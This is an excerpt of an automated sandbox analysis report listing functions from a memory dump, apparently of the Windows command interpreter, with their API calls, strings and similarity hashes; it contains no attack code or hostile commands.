                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: CloseDeleteValue$CreateOpen
                                  • String ID: %s=%s
                                  • API String ID: 1019019434-1087296587
                                  • Opcode ID: 9610a1fd2ddbdbad694bf457831f5b3b56ef2f62838768a469ab96e0e25f7f70
                                  • Instruction ID: 3d3b826e9a50c9fd09795a5b99d1e1134bf0ab6b639b7eca37fc3cf0557b06e3
                                  • Opcode Fuzzy Hash: 9610a1fd2ddbdbad694bf457831f5b3b56ef2f62838768a469ab96e0e25f7f70
                                  • Instruction Fuzzy Hash: C431AF71900B25FEDB309B598C0AEAF7A79EB89F64B058109FD096A250D7B14E41CAE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00155DB5, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcsicmp.MSVCRT ref: 00155E10
                                  • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,08000080,00000003,08000080,00000000), ref: 00155E43
                                  • _open_osfhandle.MSVCRT ref: 00155E57
                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00169D2B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                  • String ID: con
                                  • API String ID: 689241570-4257191772
                                  • Opcode ID: 355e66bcef36424ecfa13c2b3d9c5ec4d40ae55b7dc33014d4ff30351840ba2b
                                  • Instruction ID: 8804c3916f1837fd5e11c91ee0198abdf7500e31007c0f2488bafa9f2fda6cd4
                                  • Opcode Fuzzy Hash: 355e66bcef36424ecfa13c2b3d9c5ec4d40ae55b7dc33014d4ff30351840ba2b
                                  • Instruction Fuzzy Hash: 0A310B72A04514DFE7245BB89C59B6EB6AEEB45732F21022EEC31A71C0DB705D048650
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017554F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99memoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 00175584
                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 001755BE
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 00175601
                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00175608
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 0017563A
                                  • RtlFreeHeap.NTDLL(00000000), ref: 00175641
                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 00175648
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                  • String ID: PE
                                  • API String ID: 3093239467-4258593460
                                  • Opcode ID: 758fcfa7c572ac5784f52bc1d03a5a27aa06d0880d9cd2b785a6a4d9879ea653
                                  • Instruction ID: 2c56ba876f58b0f48069b7166652b1fe3d4d260361e83b7673c21a6ccb34094c
                                  • Opcode Fuzzy Hash: 758fcfa7c572ac5784f52bc1d03a5a27aa06d0880d9cd2b785a6a4d9879ea653
                                  • Instruction Fuzzy Hash: 31310674600A14A7DB2067658C08FBE7ABBEFC4B21F848119FD59D71C0DBB1CD42CA65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001784FE, Relevance: 13.6, APIs: 9, Instructions: 96fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _get_osfhandle.MSVCRT ref: 0017850D
                                  • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00178CE3,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00178515
                                    • Part of subcall function 0015DB92: _close.MSVCRT ref: 0015DBC1
                                  • _get_osfhandle.MSVCRT ref: 0017855B
                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 00178563
                                  • _get_osfhandle.MSVCRT ref: 00178575
                                  • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,00000000,00000000), ref: 0017857D
                                  • memcmp.MSVCRT ref: 0017859F
                                  • _get_osfhandle.MSVCRT ref: 001785D0
                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001785D8
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: File_get_osfhandle$Pointer$BuffersFlushRead_closememcmp
                                  • String ID:
                                  • API String ID: 332413853-0
                                  • Opcode ID: 766e928d6409f730914f250147dcb8bc35fbb893aa0b4d5f2893778cf24f3839
                                  • Instruction ID: 5fb923854fb2bb811dea622f7e8d14e6efbb43bb877a9ff475cfa88e14ad93b3
                                  • Opcode Fuzzy Hash: 766e928d6409f730914f250147dcb8bc35fbb893aa0b4d5f2893778cf24f3839
                                  • Instruction Fuzzy Hash: 3021A231A40210ABDF285FB99C4EE7A3BAEEF85361F148619F929CA190EF704C00C651
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001581E0, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 253COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00158254
                                  • memset.MSVCRT ref: 00158280
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 001583BB
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 001583C9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset
                                  • String ID: %s
                                  • API String ID: 2221118986-3043279178
                                  • Opcode ID: b6be677817633d67de77e2c0f22deef2cf5e62a490c5e071f977d9eac46f110f
                                  • Instruction ID: a8c88b9a989073332dd83e9726a3d2898604206af2919bdb74ec8d11cc3087b4
                                  • Opcode Fuzzy Hash: b6be677817633d67de77e2c0f22deef2cf5e62a490c5e071f977d9eac46f110f
                                  • Instruction Fuzzy Hash: 0691ECB1208341DBD725DF54C885BAFB3E4BF98701F00891DF9999B241EB34EA48CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00158F70, Relevance: 12.4, APIs: 8, Instructions: 447COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 001600B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000), ref: 001600C1
                                    • Part of subcall function 001600B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000,?), ref: 001600C8
                                  • _wcsnicmp.MSVCRT ref: 001591B7
                                  • wcstol.MSVCRT ref: 001591FC
                                  • wcstol.MSVCRT ref: 0015928A
                                  • longjmp.MSVCRT(?,000000FF,3DD0C51D,-00000002,?,00000000), ref: 001708B2
                                  • longjmp.MSVCRT(?,000000FF), ref: 001708C6
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
                                  • String ID:
                                  • API String ID: 2863075230-0
                                  • Opcode ID: 9c29283f50b846c67b70f9e2ae453bfed1cc6766cbfc22f0efb8cc48a68f5ef5
                                  • Instruction ID: 9a3bb049f40314e0d51b25e6c573779d283fc4d70f2219b7ece8db2f1ba6cd9e
                                  • Opcode Fuzzy Hash: 9c29283f50b846c67b70f9e2ae453bfed1cc6766cbfc22f0efb8cc48a68f5ef5
                                  • Instruction Fuzzy Hash: 2DF1C375D00216DBCB28CFA8C8806BEB7B5BF88711F19451EEC26AB380EB755D45CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00164F66, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0016501F
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • memset.MSVCRT ref: 00165098
                                  • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,?,?,-00000001,?,00000002,00000000), ref: 001650A7
                                  • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000,?,?,-00000001,?,00000002,00000000), ref: 001650E1
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0016516F
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0016517D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$EnvironmentVariable
                                  • String ID: DIRCMD
                                  • API String ID: 1405722092-1465291664
                                  • Opcode ID: c0e4d7a220a4ebbf949678f6f78fa2e935fbd921db53ca2d3ca6ea7b5abf7a80
                                  • Instruction ID: 3264178d23263d63560fe081cdbe844e717d89f81a5743fb374e72bfeca7ecb7
                                  • Opcode Fuzzy Hash: c0e4d7a220a4ebbf949678f6f78fa2e935fbd921db53ca2d3ca6ea7b5abf7a80
                                  • Instruction Fuzzy Hash: 477167B1A0C7819FD368CF29D88569BBBE5BFD9304F10492EF59983260DB308918CB57
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017196F, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 120COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?,00000000,001F0003,00000000,?,?,00000000), ref: 00171A4D
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00171A5F
                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000104), ref: 00171A68
                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00171A81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: ErrorLast$CloseCreateHandleSemaphore
                                  • String ID: _p0$internal\sdk\inc\wil\ResultMacros.h$wil
                                  • API String ID: 2276426104-46676964
                                  • Opcode ID: 63fdafbceff4ba0a098181f1a379ffd8ccc375272eab879e9461b3c4a419effb
                                  • Instruction ID: a11adca4bde0379090eceada207cac60eb62071c8d7489c7964a5570e8b7f980
                                  • Opcode Fuzzy Hash: 63fdafbceff4ba0a098181f1a379ffd8ccc375272eab879e9461b3c4a419effb
                                  • Instruction Fuzzy Hash: 4C411332B41169ABCB249F2CCD55BAA33B5EF94310F198169F81DDB280DB70CE40C7A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00156785, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: wcschr$iswdigit
                                  • String ID: +-~!$<>+-*/%()|^&=,
                                  • API String ID: 2770779731-632268628
                                  • Opcode ID: 19d5ec3deae6efe42d86256f6e16b7f8f5adf2b6f0656bcc41b9e855ce0d008a
                                  • Instruction ID: ce7c9d3f84131e7cbef8e5d54155a3ea1bd3cb0fcb8d69edf85f57461f6dd89c
                                  • Opcode Fuzzy Hash: 19d5ec3deae6efe42d86256f6e16b7f8f5adf2b6f0656bcc41b9e855ce0d008a
                                  • Instruction Fuzzy Hash: 05118276204702DF9B645F2AE84497677E8EF9A772360042FF891CF590FB219C0896A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015B610, Relevance: 12.2, APIs: 8, Instructions: 188COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0016269C: _get_osfhandle.MSVCRT ref: 001626A7
                                    • Part of subcall function 0016269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0015C5F8,?,?,?), ref: 001626B6
                                    • Part of subcall function 0016269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0015C5C6), ref: 001626D2
                                    • Part of subcall function 0016269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,00000002), ref: 001626E1
                                    • Part of subcall function 0016269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001626EC
                                    • Part of subcall function 0016269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0015C5C6), ref: 001626F5
                                  • _get_osfhandle.MSVCRT ref: 0016987D
                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001664F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00169885
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,00000000,001665F0,?,001664F0), ref: 001698C4
                                  • _get_osfhandle.MSVCRT ref: 001698DD
                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001664F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001698E5
                                    • Part of subcall function 001627C8: _get_osfhandle.MSVCRT ref: 001627DB
                                    • Part of subcall function 001627C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0018B980,000000FF,0017D620,00002000,00000000,00000000), ref: 0016281C
                                    • Part of subcall function 001627C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0017D620,-00000001,?,00000000), ref: 00162831
                                  • longjmp.MSVCRT(0018B8B8,00000001,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00169968
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                  • String ID:
                                  • API String ID: 1333215474-0
                                  • Opcode ID: 03f842add4bc682b027491c70f3e65f9fad63e3f83e4992e3c278d75d7dc675d
                                  • Instruction ID: 1147d7a286b1876e32ca98bc531b6184dd87caa7cb6ee3e3e13b8c42501c777e
                                  • Opcode Fuzzy Hash: 03f842add4bc682b027491c70f3e65f9fad63e3f83e4992e3c278d75d7dc675d
                                  • Instruction Fuzzy Hash: B251A131B00305EBDB24AFB9DC86B7AB3ACEB14705F14452EE916D7181EB71DD648B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015C923, Relevance: 10.8, APIs: 7, Instructions: 281COMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcsicmp.MSVCRT ref: 0015C9CF
                                  • _wcsicmp.MSVCRT ref: 0015C9E5
                                  • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 0015CA04
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0015CA15
                                    • Part of subcall function 0015D7D4: wcschr.MSVCRT ref: 0015D7DA
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: _wcsicmp$AttributesErrorFileLastwcschr
                                  • String ID:
                                  • API String ID: 2943530692-0
                                  • Opcode ID: 9847f937d3a11433f3735b0ed113a84c8a2f1e6e95c146722fa37e5f2d35af93
                                  • Instruction ID: ec8e3a2ff573c1025d1d814b3c77b6416a29ad92ca480dfeb3603aef55bfa388
                                  • Opcode Fuzzy Hash: 9847f937d3a11433f3735b0ed113a84c8a2f1e6e95c146722fa37e5f2d35af93
                                  • Instruction Fuzzy Hash: 9A911435A00315DFDB24AF789C8566A7BB1BF48715B14812AEC36DB280FB708D99C7C1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00165E50, Relevance: 10.8, APIs: 7, Instructions: 264COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0015EA40: wcschr.MSVCRT ref: 0015EAB7
                                    • Part of subcall function 0015EA40: iswspace.MSVCRT ref: 0015EB2D
                                    • Part of subcall function 0015EA40: wcschr.MSVCRT ref: 0015EB49
                                    • Part of subcall function 0015EA40: wcschr.MSVCRT ref: 0015EB6D
                                  • iswspace.MSVCRT ref: 00165EE4
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: wcschr$iswspace
                                  • String ID:
                                  • API String ID: 3458554142-0
                                  • Opcode ID: e75ce59867acc06e929b927e8ad227999c22ced36555965f3dfd398243a1cf7b
                                  • Instruction ID: 5c7f70b1882fb6295709c573ce1e3fc0feba4ef7751c6c30ddb1ac266534b236
                                  • Opcode Fuzzy Hash: e75ce59867acc06e929b927e8ad227999c22ced36555965f3dfd398243a1cf7b
                                  • Instruction Fuzzy Hash: 3991CF70908604DFDB24DF68EC45AAEB7F5FF49310F10852EE816E76A0EB309991CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00174CF0, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 249registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 00174D3E
                                  • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000001,0000002E,00000104,00000000,00000000,00000000,00000000,?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 00174E9A
                                  • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,\Shell\Open\Command,00000000), ref: 00174F8B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Enum$Open
                                  • String ID: %s=%s$.$\Shell\Open\Command
                                  • API String ID: 2886760741-1459555574
                                  • Opcode ID: 20dc7553caf13ebfa7f84bcee213bb630278ec00b33536077c8daeddc83df728
                                  • Instruction ID: 79bfea2de1ac148b48e3f385a807225ae932aefb82b4fe1fc99a9901f23d8ba1
                                  • Opcode Fuzzy Hash: 20dc7553caf13ebfa7f84bcee213bb630278ec00b33536077c8daeddc83df728
                                  • Instruction Fuzzy Hash: E8815C75A0021497DB349F28DC95BFB7379EFA4700F158169F81E9B281EBB49E8487D0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015B2B0, Relevance: 10.7, APIs: 7, Instructions: 172COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0015B42E: NtOpenThreadToken.NTDLL(000000FE,00000008,00000000,00000000), ref: 0015B448
                                    • Part of subcall function 0015B42E: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 0015B460
                                    • Part of subcall function 0015B42E: NtClose.NTDLL(00000000), ref: 0015B4B1
                                  • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 0015B3A5
                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 0015B3D3
                                  • RtlNtStatusToDosError.NTDLL ref: 0017133F
                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00171346
                                  • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?), ref: 001713B6
                                  • wcsstr.MSVCRT ref: 001713D1
                                  • wcsstr.MSVCRT ref: 001713EF
                                    • Part of subcall function 0015B3FC: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,001795EF,00169564,00000001,?), ref: 0015B421
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                  • String ID:
                                  • API String ID: 1313749407-0
                                  • Opcode ID: e5321f1684c59ea41173181bef43427fa78ae08afb619056aeeb3b818bebcba2
                                  • Instruction ID: c7c5052b8ea3edd9911b2042e717a2a5ce4abfc35fde62ba6875acfc64223b48
                                  • Opcode Fuzzy Hash: e5321f1684c59ea41173181bef43427fa78ae08afb619056aeeb3b818bebcba2
                                  • Instruction Fuzzy Hash: A051E031A04229DBCF649F799CC97AE73B4FF58311F1440A9ED19EB240EB349E858B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015E9A0, Relevance: 10.6, APIs: 7, Instructions: 141COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 001600B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000), ref: 001600C1
                                    • Part of subcall function 001600B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000,?), ref: 001600C8
                                  • wcschr.MSVCRT ref: 0015EB6D
                                  • iswspace.MSVCRT ref: 0015EC37
                                  • wcschr.MSVCRT ref: 0015EC4F
                                  • longjmp.MSVCRT(0018B8B8,00000001,?,00000000,?,0015ED9F,?,00000000,?), ref: 0016C024
                                  • longjmp.MSVCRT(0018B8B8,00000001), ref: 0016C036
                                  • longjmp.MSVCRT(0018B8B8,00000001,00000000,?,?), ref: 0016C049
                                  • longjmp.MSVCRT(0018B8B8,00000001), ref: 0016C05B
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: longjmp$Heapwcschr$AllocProcessiswspace
                                  • String ID:
                                  • API String ID: 2511250921-0
                                  • Opcode ID: 09bb1523378c0d3ada17f486a84df45fd62f628e8dbd80338238c15377628fa2
                                  • Instruction ID: 6e8371906c4460feff05c0d3b72dd94542b4992dfda9fb4c1f77a16ba7e670ea
                                  • Opcode Fuzzy Hash: 09bb1523378c0d3ada17f486a84df45fd62f628e8dbd80338238c15377628fa2
                                  • Instruction Fuzzy Hash: 5141E471A00211C6DB386F78DD457B632E9EF90312F14456EFC56AB181EB718E88CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00176456, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 125memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 001764A1
                                  • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00176517
                                  • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 0017657F
                                  Strings
                                  • %WINDOWS_COPYRIGHT%, xrefs: 00176487
                                  • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 0017646E
                                  • @P2w, xrefs: 00176517
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                  • String ID: %WINDOWS_COPYRIGHT%$@P2w$Copyright (c) Microsoft Corporation. All rights reserved.
                                  • API String ID: 1103618819-1019867441
                                  • Opcode ID: 28acbf46cb698bd04e0d5628a5ff99abfe8f800de0515d6aaf65b4f52f8dd2d9
                                  • Instruction ID: 5beaed85ef90ad600e00649c4f43c876d0becf6342eacef868505087a86d7b31
                                  • Opcode Fuzzy Hash: 28acbf46cb698bd04e0d5628a5ff99abfe8f800de0515d6aaf65b4f52f8dd2d9
                                  • Instruction Fuzzy Hash: 3C411336A006158BDB20CFA898407BA73B5EF48750F69406AED4AEB344EB75DD43D390
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00166E03, Relevance: 10.6, APIs: 7, Instructions: 99sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,0017BE78,00000010), ref: 00166E40
                                  • _amsg_exit.MSVCRT ref: 00166E55
                                  • _initterm.MSVCRT ref: 00166EA9
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00166ED5
                                  • exit.MSVCRT ref: 00166F1C
                                  • _XcptFilter.MSVCRT ref: 00166F2E
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                  • String ID:
                                  • API String ID: 796493780-0
                                  • Opcode ID: 869419d6d27ef116508cfa48fe2e7d81416c09e66e889809f180190de7a560dd
                                  • Instruction ID: fd19b1291b6a4b9e38eff6da262f4dc89084bf020ad21998609b6aad9b4c6f96
                                  • Opcode Fuzzy Hash: 869419d6d27ef116508cfa48fe2e7d81416c09e66e889809f180190de7a560dd
